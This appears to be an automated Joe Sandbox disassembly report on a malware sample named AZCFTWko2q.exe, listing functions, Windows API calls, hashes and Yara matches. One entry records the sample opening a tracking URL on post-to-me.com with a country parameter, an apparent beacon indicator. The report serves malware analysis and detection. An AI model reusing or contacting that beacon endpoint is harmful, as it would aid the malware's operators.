                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D29A4: TlsGetValue.KERNEL32(?,?,024D0DC2,024D2ECF,00000000,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29AA
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024D7BB1
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024E1241
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024E125A
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024E12D0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024E12D8
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024D7BBF
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024D7BC9
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024D7BD3
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D7BF1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                                      • Instruction ID: 867b4cbcb40bb9fef121233d3b941c9342489eeb9237402ea33e71104e5b057d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
• Instruction Fuzzy Hash: 49F0CD31A002186BCE15F6B6883096EF66B9F90B18B00426FD81193350EF759E058E92
APIs
  • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
• Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
  • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
  • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
• Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
• Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
• Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
• String ID:
• API String ID: 4266703842-0
• Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
• Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
• Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
• Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
APIs
• _free.LIBCMT ref: 024FA0C4
  • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
  • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
• _free.LIBCMT ref: 024FA0D6
• _free.LIBCMT ref: 024FA0E8
• _free.LIBCMT ref: 024FA0FA
• _free.LIBCMT ref: 024FA10C
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction ID: e340d9007967ed4bd606896aeee9c1a880dc97dc3131bbcc651501c383917ea9
• Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction Fuzzy Hash: 2DF06232505220ABC6F0EF55F9C6C0777DAAA84750764495BF20CD7F11CB71F8908E59
APIs
• _free.LIBCMT ref: 00439E5D
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 00439E6F
• _free.LIBCMT ref: 00439E81
• _free.LIBCMT ref: 00439E93
• _free.LIBCMT ref: 00439EA5
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
• Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
APIs
• _free.LIBCMT ref: 024F19AF
  • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
  • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
• _free.LIBCMT ref: 024F19C1
• _free.LIBCMT ref: 024F19D4
• _free.LIBCMT ref: 024F19E5
• _free.LIBCMT ref: 024F19F6
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 6869a7c4f8497a9b7b8f534d9fe8f1c4dbe1c2d9472886b302d88895b5fc6f58
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: 4DF01D70D003519BEFA16F15AC808053F61AF49B2270002ABF506977B2C774E962DF8E
APIs
• Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024DCF36
• Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024DCF67
• GetCurrentThread.KERNEL32 ref: 024DCF70
• Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024DCF83
• Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024DCF8C
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: b16b1bd0d0456a332b3d340756669b31de222dd3f2c3c1c1776490674a3bfd15
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: D7F03037200900DBC625EF62EAB09BBB7B6AFC4610311455FE58B47690CF21A947DF62
APIs
• _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2E8E
                                                                                                                                                                                                                                                                                        • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1328
                                                                                                                                                                                                                                                                                        • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1344
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024C30A1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                                                      • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                                      • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                                                      • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                                      • Instruction ID: f05beb3b11f4c0e47bf741c133908e9299e3723d66f157796b0292566a97524b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E515195E55344A8E320EFB0BC45B722378EF58712F10643BD518CB2B2E7A19984875E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 024E896A
                                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 024E8A23
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: fB$csm
                                                                                                                                                                                                                                                                                      • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                                      • Instruction ID: 2b22da791d5a1038650e9ea005772fa76e1e40a14662d232c12186aae9164693
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85410A30E00248DBDF10DF29C884AAE7BB5BF45329F14819BD9165B3A1D732D905CF91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AZCFTWko2q.exe,00000104), ref: 024EF9BA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024EFA85
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024EFA8F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                      • API String ID: 2506810119-1634012891
                                                                                                                                                                                                                                                                                      • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                                      • Instruction ID: eed9d8da3458f827b679989f76b2a02d92141da3ab53bd442370fc2d1ad8dee6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF319171A00258EFEF21DF95DC80D9EBBFCEF89711B1140ABE8069B611D7709A44CB90
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AZCFTWko2q.exe,00000104), ref: 0042F753
• _free.LIBCMT ref: 0042F81E
• _free.LIBCMT ref: 0042F828
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\AZCFTWko2q.exe
• API String ID: 2506810119-1634012891
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 024CC8DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
• ExitThread.KERNEL32 ref: 0042DFDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorExitFeatureLastPresentProcessorThread
• String ID: F(@
• API String ID: 3213686812-2698495834
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
• ExitThread.KERNEL32 ref: 0042DFDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorExitFeatureLastPresentProcessorThread
• String ID: F(@
• API String ID: 3213686812-2698495834
APIs
• Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 1381464787-923244539
APIs
• Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
• String ID: pContext
• API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                                                      • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                                      • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                                                                                      • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                                                                      • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                                      • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pScheduler$version
                                                                                                                                                                                                                                                                                      • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                                                      • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                                      • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                                      • Instruction ID: f894a45ef626dd1adfb82ee4a64b7b95086c45a33f7f4bc7b5ae4f5ad488d0db
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7A169729017869FE765CF18C8847AFBBE1EF92354F58816FD6859B381C3348942CB51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                                      • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
